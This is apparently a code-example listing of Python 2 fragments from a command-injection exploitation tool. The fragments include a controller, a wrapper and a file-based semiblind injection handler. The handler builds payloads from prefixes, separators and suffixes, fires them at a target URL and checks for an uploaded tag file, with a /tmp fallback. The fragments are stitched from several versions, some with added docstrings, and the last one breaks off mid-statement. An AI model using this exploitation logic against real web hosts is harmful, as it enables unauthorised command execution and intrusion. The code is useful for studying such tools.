Beispiel #1
def tfb_controller(no_result, url, delay, filename, tmp_path, http_request_method, url_time_response):
  """Decide whether to hand over to ``tfb_handler.exploitation``.

  If ``no_result`` compares equal to ``True``, a status line naming
  ``tmp_path`` is written to stdout and ``tfb_handler.exploitation`` is
  called with ``url``, ``delay``, ``filename``, ``tmp_path``,
  ``http_request_method`` and ``url_time_response``. For any other value
  only a carriage return is written and stdout is flushed.

  The function has no ``return`` statement, so the handler's result is
  not propagated to the caller.
  """
  if not (no_result == True):
    # Nothing to retry: only a carriage return is emitted, then flushed.
    sys.stdout.write("\r")
    sys.stdout.flush()
    return

  # tmp_path is concatenated into the console message unmodified.
  notice = "(*) Trying to upload file, on temporary directory (" + tmp_path + ")...\n"
  sys.stdout.write(notice)
  tfb_handler.exploitation(url, delay, filename, tmp_path, http_request_method, url_time_response)
Beispiel #2
def tfb_controller(no_result, url, delay, filename, tmp_path,
                   http_request_method, url_time_response):
    """Dispatch to ``tfb_handler.exploitation`` when ``no_result`` is set.

    ``no_result == True`` selects the branch that prints a status line
    containing ``tmp_path`` and then calls ``tfb_handler.exploitation``
    with the remaining arguments. Every other value of ``no_result``
    leads to a bare carriage return on stdout followed by a flush.

    Nothing is returned on either path.
    """
    retry_in_tmp = (no_result == True)
    if retry_in_tmp:
        # The message embeds tmp_path exactly as it was passed in.
        banner = ("(*) Trying to upload file, on temporary directory (" +
                  tmp_path + ")...\n")
        sys.stdout.write(banner)
        tfb_handler.exploitation(
            url, delay, filename, tmp_path, http_request_method,
            url_time_response)
        return

    # No fallback requested: write a carriage return and flush.
    sys.stdout.write("\r")
    sys.stdout.flush()
Beispiel #3
		print ""
		sys.exit(0)
	    
	  else:
	    pass
	  
  # If temp-based technique failed, 
  # use the "/tmp/" directory for tempfile-based technique.
  if no_result == True:
    if menu.options.verbose == False:
      print "[" + colors.RED + " FAILED "+colors.RESET+"]"
    else:
      print ""
    if menu.options.tmp_path:
      tmp_path = menu.options.tmp_path
    else:
      tmp_path = settings.TMP_PATH
    tmp_upload = raw_input("(*) Do you want to try the temporary directory (" + tmp_path + ") [Y/n] > ").lower()
    if tmp_upload in settings.CHOISE_YES:
      sys.stdout.write("(*) Trying to upload file, on temporary directory (" + tmp_path + ")...\n")
      tfb_handler.exploitation(url,delay,filename,tmp_path,http_request_method)     
    else:
      return False
  
  else :
    print ""
    
    
def exploitation(url,delay,filename,http_request_method):
    """Forward the four arguments, unchanged, to ``fb_injection_handler``.

    The arguments are passed positionally in the order received. The
    handler's return value is discarded, so this wrapper always returns
    ``None``.
    """
    # NOTE(review): any status the handler returns is dropped here;
    # confirm that no caller needs it.
    handler_args = (url, delay, filename, http_request_method)
    fb_injection_handler(*handler_args)
Beispiel #4
    # If temp-based technique failed,
    # use the "/tmp/" directory for tempfile-based technique.
    if no_result == True:
        if menu.options.verbose == False:
            print "[" + colors.RED + " FAILED " + colors.RESET + "]"
        else:
            print ""
        if menu.options.tmp_path:
            tmp_path = menu.options.tmp_path
        else:
            tmp_path = settings.TMP_PATH
        tmp_upload = raw_input(
            "(*) Do you want to try the temporary directory (" + tmp_path +
            ") [Y/n] > ").lower()
        if tmp_upload in settings.CHOISE_YES:
            sys.stdout.write(
                "(*) Trying to upload file, on temporary directory (" +
                tmp_path + ")...\n")
            tfb_handler.exploitation(url, delay, filename, tmp_path,
                                     http_request_method)
        else:
            return False

    else:
        print ""


def exploitation(url, delay, filename, http_request_method):
    """Thin wrapper that delegates to ``fb_injection_handler``.

    ``url``, ``delay``, ``filename`` and ``http_request_method`` are
    handed over positionally and unmodified. Whatever the handler returns
    is ignored; the wrapper itself returns ``None``.
    """
    # NOTE(review): the handler's result is not propagated to the caller;
    # verify that this is intended.
    forwarded = (url, delay, filename, http_request_method)
    fb_injection_handler(*forwarded)
Beispiel #5
def fb_injection_handler(url, delay, filename, http_request_method):

    counter = 0
    vp_flag = True
    no_result = True
    is_encoded = False
    stop_injection = False
    injection_type = "Semiblind-based Command Injection"
    technique = "file-based semiblind injection technique"

    sys.stdout.write(colors.BOLD + "(*) Testing the " + technique + "... " +
                     colors.RESET)
    sys.stdout.flush()

    # Print the findings to log file.
    output_file = open(filename + ".txt", "a")
    output_file.write("\n---")
    output_file.write("\n(+) Type : " + injection_type)
    output_file.write("\n(+) Technique : " + technique.title())
    output_file.close()

    for prefix in settings.PREFIXES:
        for suffix in settings.SUFFIXES:
            for separator in settings.SEPARATORS:

                # Check for bad combination of prefix and separator
                combination = prefix + separator
                if combination in settings.JUNK_COMBINATION:
                    prefix = ""

                # Change TAG on every request to prevent false-positive resutls.
                TAG = ''.join(
                    random.choice(string.ascii_uppercase) for i in range(6))

                # Check if defined "--base64" option.
                if menu.options.base64_trick == True:
                    B64_ENC_TAG = base64.b64encode(TAG)
                    B64_DEC_TRICK = settings.B64_DEC_TRICK
                else:
                    B64_ENC_TAG = TAG
                    B64_DEC_TRICK = ""

                # The output file for file-based injection technique.
                OUTPUT_TEXTFILE = B64_ENC_TAG + ".txt"

                sys.stdout.write("\n(*) Trying to upload the '" +
                                 OUTPUT_TEXTFILE + "' on " +
                                 settings.SRV_ROOT_DIR + "... ")
                try:

                    # File-based decision payload (check if host is vulnerable).
                    payload = fb_payloads.decision(separator, B64_ENC_TAG,
                                                   B64_DEC_TRICK,
                                                   OUTPUT_TEXTFILE)

                    # Check if defined "--prefix" option.
                    if menu.options.prefix:
                        prefix = menu.options.prefix
                        payload = prefix + payload
                    else:
                        payload = prefix + payload

                    # Check if defined "--suffix" option.
                    if menu.options.suffix:
                        suffix = menu.options.suffix
                        payload = payload + suffix
                    else:
                        payload = payload + suffix

                    #Check if defined "--verbose" option.
                    if menu.options.verbose:
                        sys.stdout.write("\n" + colors.GREY + payload +
                                         colors.RESET)

                    # Check if target host is vulnerable.
                    response, vuln_parameter = fb_injector.injection_test(
                        payload, http_request_method, url)

                    # Find the directory.
                    path = url
                    path_parts = path.split('/')
                    count = 0
                    for part in path_parts:
                        count = count + 1
                    count = count - 1
                    last_param = path_parts[count]
                    output = url.replace(last_param, OUTPUT_TEXTFILE)
                    time.sleep(delay)

                    try:
                        # Evaluate test results.
                        output = urllib2.urlopen(output)
                        html_data = output.read()
                        shell = re.findall(r"" + TAG + "", html_data)

                    # If temp-based technique failed, use the "/tmp/" directory for tempfile-based technique.
                    except urllib2.HTTPError, e:
                        if e.getcode() == 404:

                            stop_injection = True
                            if menu.options.tmp_path:
                                tmp_path = menu.options.tmp_path
                            else:
                                tmp_path = settings.TMP_PATH

                            print colors.BGRED + "\n(x) Error: Unable to upload the '" + OUTPUT_TEXTFILE + "' on '" + settings.SRV_ROOT_DIR + "'." + colors.RESET + ""
                            sys.stdout.write("(*) Trying to upload the '" +
                                             OUTPUT_TEXTFILE +
                                             "' on temporary directory (" +
                                             tmp_path + ")...\n")
                            tfb_handler.exploitation(url, delay, filename,
                                                     tmp_path,
                                                     http_request_method)
                            sys.exit(0)

                    except urllib2.URLError, e:
                        print colors.BGRED + "(x) Error: The host seems to be down!" + colors.RESET
                        sys.exit(0)

                except: